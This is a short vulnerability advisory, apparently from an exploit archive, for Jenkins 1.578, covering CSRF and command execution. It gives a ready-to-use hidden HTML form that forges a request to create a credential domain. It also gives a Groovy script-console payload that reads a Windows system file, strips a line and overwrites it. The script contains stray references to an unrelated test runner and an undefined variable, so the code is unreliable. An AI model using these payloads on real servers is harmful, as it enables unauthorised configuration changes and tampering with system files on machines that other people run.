56 lines
No EOL
1.3 KiB
Text
56 lines
No EOL
1.3 KiB
Text
#Affected Vendor: http://jenkins-ci.org/
|
|
#Date: 03/09/2014
|
|
#Discovered by: JoeV
|
|
#Type of vulnerability: CSRF and Command Execution
|
|
|
|
#Tested on: Windows 7
|
|
#Version : 1.578
|
|
|
|
#Description: Jenkins is susceptible to CSRF attack and command
|
|
execution. Using groovy one can fire any command and get it executed
|
|
by the script console thus able to access files, registry keys, values
|
|
and folders which is outbound for Jenkins.
|
|
|
|
|
|
#CSRF
|
|
|
|
--------
|
|
|
|
#Payload:
|
|
|
|
<form method="POST" name="form0"
|
|
action="http://localhost:8090/credential-store/createDomain">
|
|
|
|
<input type="hidden" name="_.name" value="xyz"/>
|
|
<input type="hidden" name="description" value="abc"/>
|
|
<input type="hidden" name="json" value="{'name': 'xyz', 'description': 'abc'}"/>
|
|
<input type="hidden" name="Submit" value="OK"/>
|
|
</form>
|
|
|
|
|
|
Command Execution (/script)
|
|
-------------------------------------
|
|
ArrayList pids = null
|
|
PrintWriter writer = null
|
|
|
|
File f = new File("C:/Windows/System32/Services.msc")
|
|
|
|
if (f.length() > 0){
|
|
pids = new ArrayList()
|
|
f.eachLine { line -> pids.add(line) }
|
|
println("Item to be removed: " + pids.get(0))
|
|
testRunner.testCase.setPropertyValue( "personId", pid )
|
|
pids.remove(0)
|
|
println pids
|
|
writer = new PrintWriter(f)
|
|
pids.each { id -> writer.println(id) }
|
|
writer.close()
|
|
}
|
|
else{
|
|
println "Null"
|
|
}
|
|
|
|
--
|
|
Regards,
|
|
|
|
*Joel V* |